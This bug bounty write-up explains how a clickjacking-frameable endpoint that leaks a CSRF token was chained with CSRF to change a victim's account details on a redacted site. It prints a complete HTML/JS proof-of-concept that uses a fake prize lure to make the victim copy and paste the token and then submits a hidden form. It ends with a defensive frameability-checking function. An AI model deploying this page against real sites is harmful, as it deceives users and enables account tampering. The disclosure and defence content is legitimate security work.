Bypass CSRF With ClickJacking Worth $1250

Saad Ahmed

Hello friends, I hope you are all doing well. This write-up is about how I chained two different vulnerabilities to update a victim's account details. Let's assume the website is redacted.com.

When I visited the profile page https://redacted.com/editinfo/ and tried to change the account details, the request was protected by a CSRF token. I tried many methods to bypass this CSRF protection, but none of them worked. Then I found a suspicious endpoint that disclosed the CSRF token: https://redacted.com/accountinfo/personal/lpsust/v1/redacted.com/

When I opened that endpoint, I found the CSRF token in its response. The next part was stealing that token. I found that the endpoint had no protection against clickjacking (it could be loaded inside an iframe), so I created an HTML + JS page that exploits the CSRF in just one click:

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>

<center><h1 style="color: blue; text-decoration: underline;">Lucky Draw to Win a $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<!-- Invisible frame of the token-disclosing endpoint; the victim copies its JSON body -->
<div style="border: 2px solid gray;">
<iframe src="https://redacted.com/accountinfo/personal/lpsust/v1/redacted.com/" width="100%" style="opacity: 0"></iframe>
</div>

<h3>Click inside the box and press CTRL+V</h3>
<input type="password" name="" size="1">

<br>
<button id="btn">Click to Win</button>

<!-- Hidden form carrying the profile fields to overwrite -->
<div style="display: none;">
<form action="" method="POST">
<input type="hidden" name="addrid" value="12741305" />
<input type="hidden" name="uname" value="hack@gmail.com" />
<input type="hidden" name="issendmsg" value="1" />
<input type="hidden" name="display" value="" />
<input type="hidden" name="sendtype" value="update" />
<input type="hidden" name="firstname" value="accountinfo" />
<input type="hidden" name="lastname" value="HACKED" />
<input type="hidden" name="country" value="US" />
<input type="hidden" name="reglang" value="en&#95;US" />
<input type="hidden" name="postcode" value="1337" />
<input type="submit" value="Submit request" />
</form>
</div>

<script>
document.querySelector("#btn").onclick = function() {
  // The first <input> in the DOM is the paste box, not a hidden form field
  var token = document.querySelector("input").value;
  var form = document.querySelector("form");

  // The pasted endpoint response is JSON; its Value field holds the CSRF token
  token = JSON.parse(token);
  var mapInput = document.createElement("input");
  mapInput.type = "hidden";
  mapInput.name = "auth_token";
  mapInput.value = token.Value;

  form.appendChild(mapInput);

  form.action = "https://redacted.com/editInfo";
  form.submit();
  alert("Congratulation! You have won $100");
}
</script>

</body>
</html>

When the victim pastes the API response into the field and clicks CLICK TO WIN, the JS code appends an input field carrying the victim's CSRF token to the form and submits the request that updates the account details. Boom, it worked. I hope you liked it.
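The chain only works because the token-disclosing endpoint could be loaded in an iframe. As an added example (not code from the original post), the function below takes a response's headers and decides whether a page on another origin could frame it, applying the rule browsers use: a CSP frame-ancestors directive takes precedence over X-Frame-Options, and the deprecated ALLOW-FROM value gives no protection. The header values and origins in the comments are constructed for illustration.

```javascript
// Match one CSP frame-ancestors source expression (e.g. https://*.example.com)
// against an embedder origin. 'self' is resolved by the caller.
function matchesSource(src, origin) {
  if (src === "'self'") return false;
  let [scheme, host] = src.includes("://") ? src.split("://") : [null, src];
  const o = new URL(origin);
  if (scheme && scheme !== o.protocol.replace(":", "")) return false;
  host = host.replace(/:\d+$/, "").replace(/\/.*$/, "");   // drop port and path
  if (host === "*") return true;
  if (host.startsWith("*.")) return o.hostname.endsWith(host.slice(1));
  return host === o.hostname;
}

// Returns true when a document served with `headers` from `targetOrigin`
// can be framed by a page on `embedderOrigin`.
function isFrameable(headers, embedderOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const sameOrigin = embedderOrigin === targetOrigin;

  // CSP frame-ancestors, when present, overrides X-Frame-Options entirely
  const csp = h["content-security-policy"] || "";
  const fa = csp.split(";").map(s => s.trim()).find(d => d.startsWith("frame-ancestors"));
  if (fa) {
    const sources = fa.split(/\s+/).slice(1).map(s => s.toLowerCase());
    if (sources.length === 0 || sources.includes("'none'")) return false;
    if (sources.includes("'self'") && sameOrigin) return true;
    return sources.some(s => matchesSource(s, embedderOrigin));
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return sameOrigin;
  // No header, or an unsupported value such as ALLOW-FROM: browsers allow framing
  return true;
}
```

Running it against the headers of the token endpoint (an empty object, as in the write-up) returns true, which is exactly the condition the copy-and-paste page above relies on.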

./LOGOUT
